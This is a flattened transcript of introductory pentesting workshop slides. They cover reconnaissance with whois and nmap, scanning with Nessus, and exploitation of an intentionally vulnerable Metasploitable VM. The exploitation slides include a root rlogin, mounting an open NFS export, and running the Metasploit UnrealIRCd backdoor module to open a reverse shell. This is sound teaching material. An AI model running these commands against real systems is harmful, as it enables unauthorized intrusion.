Pentesting - Pentest.pdf · •Pentest Lab 1.1 - Setup Vmware/ Virtual Box, Kali Linux VM,...
Transcript of Pentesting - Pentest.pdf · •Pentest Lab 1.1 - Setup Vmware/ Virtual Box, Kali Linux VM,...
-
PentestingAn Introduction
-
Workshop Flow – 1
• Nature of Cyber Security Problem (Slides 4-7)
• Introduction – Pentesting - what, why, how (8-9)
• Pentesting - Intelligence Gathering (10-11)
• Pentesting tools Demo– Kali Linux, NMAP (12)
• Intelligence Gathering using WhoIS (13-15)
• Metasploitable OS – An Introduction (16)
• Pentest Lab 1.1 - Setup Vmware/ Virtual Box, Kali Linux VM, Metasploitable VM, Familiarity with Kali Linux, WhoIs
• Intelligence Gathering using NMAP (18-36)• Host Discovery• Port Scanning• OS Detection• Services and Version Detection
• Pentest Lab 1.2 – Intelligence Gathering with NMAP
-
Workshop Flow - 2
• Vulnerability Analysis (38-39)
• Scanning with Nessus (40-42)
• Understanding Nessus Vulnerability Report (43)
• Understand Vulnerabilties, where do they arise from? (44)
• Exploiting Vulnerabilities – Metasploit and Tools (45-54)• Rlogin• NFS-Share• Metasploit
• Approach to security --- Threat Modelling (55)
• Pentest Lab 1.3• Scanning with Nessus, Analysing the Report• Exploit Vulnerability1, Tools• Exploit Vulnerability2, Tools• Exploit Vulnerability3,4 using Metasploit
-
Black Hat – White Hat (A Game)
• Securing Our Home – A perspective
-
Security is Game of Survival
To Survive Deer should run faster than Tiger
To Survive Tiger should run faster than Deer
-
Physical Security vs Cyber Security
• How similar/ different• Intent
• Nature of the problem• Internet, Global boundaries, Glorified hackers,
Attack tools, Standards, Underworld economy, Accountability, Who is the adversary
• Strategy (attack and defense)• Weakest link strategy, All bases covered
strategy, Insider attack, Policies at different levels etc.
• Are they separate any more?
Spyware
Financial Malware
-
Security Problem Solving• Security : a Negative Goal.
• Achieve something despite whatever adversary might do. • Positive goal: “Ram can read grades.txt".
• Ask Ram to check that it works. Easy to check • Negative goal: “Shyam cannot read grades.txt".
• Check if Shyam cannot read grades.txt? Good to check, but not nearly enough. Must reason about all possible ways in which Shyam might get the data.
• How might Shyam try to get the contents of grades.txt? Change permissions ,Steal file, Impersonate etc.
• Open Ended Problem. No absolute definitive answer
• Threat Model Concept & Problem Solving
-
Pentesting – What, Why, How
• Pentesting : An Attack on a system in hopes of finding security weaknesses
• Rationale : Improving the security of your site by breaking into it
• How : Using Attacker’s Techniques
-
Pentesting – How is it usually done
• Intelligence/ Information Gathering
• Information Analysis and Planning – Component relationships, Target
identification etc
• Vulnerability Detection
• Penetration – Developing/ Customising, Choosing Exploit tools
• Attack/Privilege Escalation
• Analysis and reporting
• Clean-up
-
Intelligence Gathering
• What are we looking for?• Organizational intelligence, Access point discovery, Network discovery, Infrastructure
fingerprinting
• Open Source Intelligence• Corporate Information :: Location, Org Chart, Document Metadata, Network, Email
Address, Applications used, Purchase Agreements, Defense Technologies Used (Fingerprinting), Financial Information etc
• Individual Information :: All about individual, Social Engineering
• Covert Intelligence : Through Individuals
• Footprinting (next slide)
• Identify Protection Systems (Network, Host, Application, Storage etc)
-
Intelligence Gathering - Footprinting
• Passive Reconnaisance : Who is lookup, BGP Looking glasses
• Active Footpriting : Port Scanning, Banner Grabbing, SNMP sweeps, DNS Discovery, Forward/ Reverse DNS, Web Application Discovery, Virtual Host Detection
• Establish Target List : Versions, Weak web applications, Patch level
-
Kali Linux - Demo
A Collection of all Cyber Security related tools
Tools for Information Collection
Some info gathering tools
Some Possible Recon-ng/ Harvester, Maltego, NMAP, Burpsuite, Nessus/ Acunetix
-
Footprint - First Data
• IP ADDress ( some Ip address in the network to start with )…hunting IP Address
• whois a normally goodplace to start…maltego???...emailID, headers
-
Whois lookup
• Install it on your linux distro by entering apt-get install whois in terminal
• https://registry.in/whois/nita.ac.in
• Domain Name: NITA.AC.INRegistry Domain ID: D3544155-AFINRegistrar WHOIS Server:Registrar URL: http://www.ernet.inUpdated Date: 2017-03-02T07:21:44ZCreation Date: 2009-04-06T05:03:46ZRegistry Expiry Date: 2019-04-06T05:03:46ZRegistrar Registration Expiration Date:Registrar: ERNET IndiaRegistrar IANA ID: 800068Registrar Abuse Contact Email:Registrar Abuse Contact Phone:Reseller:Domain Status: okRegistrant Organization: National Institute of Technology, AgartalaRegistrant State/Province:Registrant Country: INName Server: ns1.nkn.inName Server: ns2.nkn.inDNSSEC: unsignedURL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/>>> Last update of WHOIS database: 2018-06-25T15:58:44Z
http://www.ernet.in/https://registry.in/index.php?query=180.149.63.3&output=nicehttps://registry.in/index.php?query=180.149.63.66&output=nicehttps://www.icann.org/wicf
-
Whois lookup
• root@kali:~# ping ns1.nkn.inPING ns1.nkn.in (180.149.63.3) 56(84) bytes of data.
64 bytes from ns1.nkn.in (180.149.63.3): icmp_seq=1 ttl=56 time=40.3 ms
64 bytes from ns1.nkn.in (180.149.63.3): icmp_seq=2 ttl=56 time=45.0 ms
64 bytes from ns1.nkn.in (180.149.63.3): icmp_seq=3 ttl=56 time=46.1 ms
64 bytes from ns1.nkn.in (180.149.63.3): icmp_seq=4 ttl=56 time=45.3 ms
64 bytes from ns1.nkn.in (180.149.63.3): icmp_seq=5 ttl=56 time=44.5 ms
--- ns1.nkn.in ping statistics ---
5 packets transmitted, 5 received, 0% packet loss, time 7715ms
rtt min/avg/max/mdev = 40.333/44.292/46.140/2.048 ms
-
Metasploitable - Introduction
• An intentionally vulnerable Ubuntu Linux virtual machine that is designed for testing common vulnerabilities.
• Used for Labs to exploit
• This virtual machine is compatible with VMWare, VirtualBox, and other common virtualization platforms.
• Created by the Rapid7 Metasploit team
• Metasploitable login is “msfadmin”; the password is also “msfadmin”
-
Lab 1.1
• Lab Setup• Virtual Box/ Vmware
• Kali Linux, Metasploitable
• Kali Linux Tools
• Metasploitable
• Testing communication between Kali Linux, Metasploitable server
• Whois
-
NMAP
• nmap is an open-source port/security scanner
• It’s primary function is the discovery and mapping of hosts on a network
• nmap is consistently voted as one of the most used security tools
• Needs as input a range or some specific address……..
-
NMAP
• Host Discovery – Identifying computers on a network
• Port Scanning – Enumerating the open ports on one or more target computers
• Version Detection – Interrogating listening network services • listening on remote computers to determine the application name and
version number
• OS Detection – Remotely determining the operating system from network devices
-
NMAP Demo (Script)
Run nmap command on Kali Linux Terminal.
Sample Syntax:
nmap [ ...] [ ] { }
TARGET SPECIFICATION:
Can pass hostnames, IP addresses, networks, etc.
Ex: scanme.nmap.org, microsoft.com/24, 192.168.0.1; 10.0.0-255.1-254
-iL : Input from list of hosts/networks
-iR : Choose random targets
--exclude : Exclude hosts/networks
--excludefile : Exclude list from file
Nmap –v –A …look at the report nmap_report_1.txt in kali linux reports folder
-
NMAP Host Discovery
• Querying multiple hosts using this method is referred to as ping sweeps …sweep through a range of IP addresses
• The most basic step in mapping out a network.
• Several Sweeps technique• ARP Sweep (default)• ICMP Sweeps• Broadcast ICMP• NON Echo ICMP• TCP sweep• UDP sweep
-
Host Discovery : ARP Sweep “nmap 10.0.2.0/24 –sn “
-
Host Discovery : ICMP Sweeps• Used by nmap when router in between (WAN)
• Technique• sending an ICMP ECHO request (ICMP type 8)• If an ICMP ECHO reply (ICMP type 0) is received : target is alive; • No response: target is down
• Pros & Cons• easy to implement• fairly slow, easy to be blocked
Scanner Target
ICMP ECHO request
ICMO ECHO reply
Scanner Target
a host is alive
a host is down/filtered
ICMP ECHO request
No response
-
Host Discovery : TCP Sweeps
• Sending TCP ACK or TCK SYN packets
• The port number can be selected to avoid blocking by firewall• Usually a good pick would be 21 / 22 / 23 / 25 / 80
• But.. firewalls can spoof a RESET packet for an IP address, so TCP Sweeps may not be reliable.
-
Host Discovery : UDP Sweeps
• Relies on the ICMP PORT UNREACHABLE
• Assume the port is opened if no ICMP PORT UNREACHABLE message is received after sending a UDP datagram
• Cons:• Routers can drop UDP packets as they cross the Internet
• Many UDP services do not respond when correctly probed
• Firewalls are usually configured to drop UDP packets (except for DNS)
• UDP sweep relies on the fact that a non-active UDP port will respond with an ICMP PORT UNREACHABLE message
-
NMAP Host Discovery summary• sL: List Scan - simply list targets to scan• -sn: Ping Scan - go no further than determining if host is online• -PN: Treat all hosts as online -- skip host discovery
• -PS/PA/PU [portlist]: TCP SYN/ACK or UDP discovery to given ports• -PE/PP/PM: ICMP echo, timestamp, and netmask request discovery probes• -PO [protocol list]: IP Protocol Ping
• -n/-R: Never do DNS resolution/Always resolve [default: sometimes]• --dns-servers : Specify custom DNS servers• --system-dns: Use OS's DNS resolver
• -sU: UDP ScanDemo and look at wireshark captureroot@kali:~# nmap -sn 10.0.2.4
Starting Nmap 7.70 ( https://nmap.org ) at 2018-06-26 05:36 EDTNmap scan report for 10.0.2.4Host is up (0.00026s latency).
MAC Address: 08:00:27:1A:23:D5 (Oracle VirtualBox virtual NIC)Nmap done: 1 IP address (1 host up) scanned in 0.13 seconds
-
Port Scanning : TCP Connect Scan• Use basic TCP connection establishment mechanism; complete 3-ways handshake
• Easily to detect by inspecting the system log
• Normally not used since expensive
Scanner Target
SYN
SYN/ACK
ACK
Scanner Target
SYN
RST/ACK
a port is opened
a port is closed
-
Port Scanning : TCP SYN scan• Do not establish a complete connection (Half Open scanning)
• send a SYN packet and wait for a response• If an SYN/ACK is received=> the port is LISTENING
• immediately tear down the connection by sending a RESET
• If an RST/ACK is received =>a non-LISTENING port. nmap –Pn is Syn scan for all ports
Scanner Target
SYN
SYN/ACK
Scanner Target
SYN
RST/ACK
a port is closed
a port is opened
RST
-
Port Scanning : Stealth Scan• To gather information about target sites while avoiding
detection • Try to hide themselves among normal network traffic• Not to be logged by logging mechanism (stealth)
• Techniques• Flag Probe packets (Also called “Inverse mapping”)
• Response is sent back only by closed port• By determining what services do not exist, an intruder can infer what
service do exist
• Slow scans rate• difficult to detect =>need long history log
CERT reported this technique in CERT® Incident Note IN-98.04
http://www.cert.org/incident_notes/IN-98.04.html
-
Port Scanning : Stealth Mapping• RFC793: to handle wrong state packets
• closed ports : reply with a RESET packet to wrong state packets
• opened ports : ignore any packet in question
• Technique
• A RST scan
• A FIN probe with the FIN TCP flag set (eg nmap –sF –p25 and capture)
• An XMAS probe with : set FIN, URG, ACK, SYN, RST, PUSH flags set (eg nmap –sX –p27
-
Port Scanning with nmap• SCAN TECHNIQUES:
• -sS/sT/sA/sW/sM: TCP SYN/Connect()/ACK/Window/Maimon scans• -sN/sF/sX: TCP Null, FIN, and Xmas scans• -b : FTP bounce scan
• PORT SPECIFICATION AND SCAN ORDER:• -p : Only scan specified ports
• Ex: -p22; -p1-65535; -p U:53,111,137,T:21-25,80,139,8080• -F: Fast mode - Scan fewer ports than the default scan• -r: Scan ports consecutively - don't randomize• --top-ports : Scan most common ports• --port-ratio : Scan ports more common than
Demo : Look at wire shark capture of nmap –sP x.x.x.x ( uses syn scan colorized conversations)nmap -Pn 10.0.2.4Starting Nmap 7.70 ( https://nmap.org ) at 2018-06-26 05:14 EDTNmap scan report for 10.0.2.4Host is up (0.00037s latency).Not shown: 977 closed portsPORT STATE SERVICE21/tcp open ftp22/tcp open ssh23/tcp open telnet
-
Services and Versions Detection
• The nmap-service-probes database contains probes for querying various services and match expressions to recognize and parse responses
-
Operating System Detection
• Banner, DNS HINFO and …
• TCP/IP fingerprinting (IP stack implementation will response differently)• FIN probe, Bogus Flag probe
• TCP initial sequence number sampling, TCP initial window, ACK value
• ICMP error quenching, message quoting, ICMP echo integrity
• IP: DF, TOS, Fragmentation
-
OS Detection : Examples
• ACK : sending FIN|PSH|URG to a closed port• most OS : ACK with the same sequence number
• Windows: ACK with sequence number+1
• Type of Service: Probing with an ICMP_PORT_UNREACHABLE message• most OS : TOS = 0
• Linux : TOS= 0xC0
-
Version and OS Detection with nmap
• SERVICE/VERSION DETECTION:• -sV: Probe open ports to determine service/version info
• --version-intensity : Set from 0 (light) to 9 (try all probes)
• --version-light: Limit to most likely probes (intensity 2)
• --version-all: Try every single probe (intensity 9)
• --version-trace: Show detailed version scan activity (for debugging)
• OS DETECTION:-O: Enable OS detection--osscan-limit: Limit OS detection to promising targets--osscan-guess: Guess OS more aggressively
Demo -sV and wireshark capture
root@kali:~# nmap -sV 10.0.2.4
Starting Nmap 7.70 ( https://nmap.org ) at 2018-06-26 06:01 EDT
Nmap scan report for 10.0.2.4
Host is up (0.00010s latency).
Not shown: 977 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
-
Lab 1.2
• Workshop Lab Document
-
Vulnerabilties
• According to Wikipedia;
“The word vulnerability, in computer security, refers to a weakness in a systemallowing an attacker to violate the confidentiality, integrity, availability, access control,consistency or audit mechanisms of the system or the data and applications it hosts”
• To Software Developers, a bug is synonymous to a vulnerability.• Ex: Errors in program’s source code or flawed program design
• Buffer overflows• Memory leaks• Dead locks• Arithmetic overflow• Accessing protected memory (Access Violation)
• Software bug we are speaking of, they are used as the foundation to form an exploit.SecurityAttack on Vulnerability is exploit.
-
Vulnerabilities
Using Nmap or any scanner Find any hosts worthwhile? Next step should be scanning for exploitable vulnerabilities.
What could be the approach?
• What data do we have till now?
Hosts, Open Ports, Operating System, Applications Running, Versions
• How could we use this data? Use this data to find vulnerabilities using various resources on the net (exploit DB, CVE database, other databases)
Or
• Use a Vulnerability Scanner
-
Vulnerability Scanner - Nessus
• Nessus is a proprietary vulnerability scanner with Home version free
• Nessus runs a set of exploits on the open ports and reports vulnerabilities
• Vulnerability checks are implemented through plugins. • Plugins are written in Nessus Attack Scripting Language (NASL), a
scripting language optimized for custom network interaction. • New plugins are added as vulnerabilities are discovered. • Many plugins check for a vulnerability by actually exploiting the
vulnerability.• The ‘safe checks’ option specifies that no vulnerability check capable of
crashing a remote host be used (such as DOS attacks).• DEMO…look at Basic scan and Plugins
-
Vulnerability Scanner - Nessus
• Download Nessus
• On Kali Linux terminal run /etc/init.d/nessusd start
Will get Starting Nessus….
• Go to https://127.0.0.1:8834/#/
-
Vulnerabilties
Now we know the Vulnerabilities
What’s out Goal with this knowledge?
- Understand where Vulnerabilities arise from (to Prevent in future)
- Understand how exploitations happen (to be able write signatures/ exploit detection)
Understand the vulnerability, categories/ families? (Nessus Families?)
Find a tool to Exploit/ Write an exploit
Metasploit – Rapid7…Demo
-
Vulnerability – Rlogin ExploitIf we look at Family vertical of Nessus Report, we see some simple ones
- Backdoor
- Gain a shell remotely
- Service Detection – Existence of the service itself indicates vulnerability. Let’s try to exploit “rlogin service detection”
- Click on rlogin Service Detection in nessus report to get details
On Kali Linux Install rsh-client (for rlogin command else it defaults to ssh)
apt-get install rsh-client
rlogin -l root 10.0.2.4Last login: Thu Jun 28 07:28:57 EDT 2018 from :0.0 on pts/0
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686
Snip….Snip
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
You have new mail.
root@metasploitable:~#
-
Vulnerability – NFS Share Exploit
- Let’s try to exploit “nfs exported share information disclosure”- Click on the same in nessus report to get detailsOn Kali Linux Install rpcbind only if you want to recheck if nfs is running), nfs-common
apt-get install rpcbind
apt-get install nfs-common
root@kali:~# showmount -e 10.0.2.4
Export list for 10.0.2.4:
/ *
root@kali:~# mkdir /tmp/r00t
root@kali:~# mount -t nfs 10.0.2.4:/ /tmp/r00t/
root@kali:~# ls
amit_passwd Documents Music Pictures Templates Videos
Desktop Downloads 'nmap scan reports' Public trojan.exe
-
Vulnerabilties – Exploit Payload
• Exploits are commonly used to install system malware or gain system access or recruit client machines into an existing ‘botnet’.
• This is accomplished with the help of a payload
• The payload is a sequence of code that is executed when the vulnerability is triggered
• To make things clear, an Exploit is really broken up into two parts, like so;
EXPLOIT = Vulnerability + Payload;
• Different payload types exist and they accomplish different tasks• exec → Execute a command or program on the remote system• download_exec→ Download a file from a URL and execute• upload_exec→ Upload a local file and execute• adduser → Add user to system accounts
-
Metasploit Framework
What is the Metasploit Framework?
• According to the Metasploit Team;
“The Metasploit Framework is a platform for writing, testing, and using
exploit code. The primary users of the Framework are professionals
performing penetration testing, shellcode development, and
vulnerability research.”
-
Metasploit Framework
• The MSF is not only an environment for exploit development but also a platform for launching exploits on real-world applications. It is packaged with real exploits that can provide real damage if not used professionally.
• The fact that MSF is an open-source tool and provides such a simplified method for launching dangerous attacks, it has and still is attracting blackhat and whitehat beginners. Fairly dangerous.
-
Vulnerabilties –Exploits using Metasploit
db_nmap -v -T4 -PA -sV --version-all --osscan-guess -A -sS -p 1-65535
Scans Metsploitable
-
Vulnerabilties –Exploits using Metasploit
• run the following command:
Services
• Compare
With Nessus
Report
-
Vulnerabilties –Exploits using Metasploit
Usually the sequence for exploiting is
- Search for the Exploit/ payload using command “search xxx”. Search can be on multiple keywords related to vulnerability eg CVE, module etc
- “use ”
- “Info” to get information on the Exploit
- “run” to execute the exploit
-
Vulnerabilties – UnrealIRCd Backdoor Detection
- Click on UnrealIRCd Backdoor Detection in Nessus Report
Provides information including CVE No ‘ CVE-2010-2075’
- In Metasploit ‘Search CVE-2010-2075’ givesmsf exploit(unix/irc/unreal_ircd_3281_backdoor) > search cve-2010-2075
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
exploit/unix/irc/unreal_ircd_3281_backdoor 2010-06-12 excellent UnrealIRCD 3.2.8.1 Backdoor Command Execution
- ‘Use exploit/unix/irc/unreal_ircd_3281_backdoor ‘ gives cursurmsf exploit(unix/irc/unreal_ircd_3281_backdoor) >
- ‘info’ provides information of payload. RHOST is not set
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-2075
-
Vulnerabilties – UnrealIRCd Backdoor Detection
msf exploit(unix/irc/unreal_ircd_3281_backdoor) > set RHOST 10.0.2.4
RHOST => 10.0.2.4
msf exploit(unix/irc/unreal_ircd_3281_backdoor) > run
[*] Started reverse TCP double handler on 10.0.2.15:4444
[*] 10.0.2.4:6667 - Connected to 10.0.2.4:6667...
:irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...
:irc.Metasploitable.LAN NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead
[*] 10.0.2.4:6667 - Sending backdoor command...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo NkKbs49F8lfv25Hf;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "NkKbs49F8lfv25Hf\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (10.0.2.15:4444 -> 10.0.2.4:60006) at 2018-06-28 12:20:03 -0400
>>>>>>>.
-
Security Approach – Threat Modeling
Structured approach to identifying, quantifying, and addressing threats.
In threat modeling, we cover the three main elements:
• Assets: What valuable data and equipment should be secured?
• Threats: What may an attacker do to the system?
• Vulnerabilities: What flaws in the system allow an attacker to realize a threat?
Possible Steps to Threat Modeling
• Identify the Assets
• Describe the Architecture Describe the Architecture
• Break down the Applications
• Identify the Threats
• Document and Classify the Threats
• Rate the Threats
-
Lab 1.3
Nessus Scan – Metasploitable
Look at Vulnerabilities
2 Vulnerabilities without Metasploit
Metasploit Commands
2 Vulnerabilities with Metasploit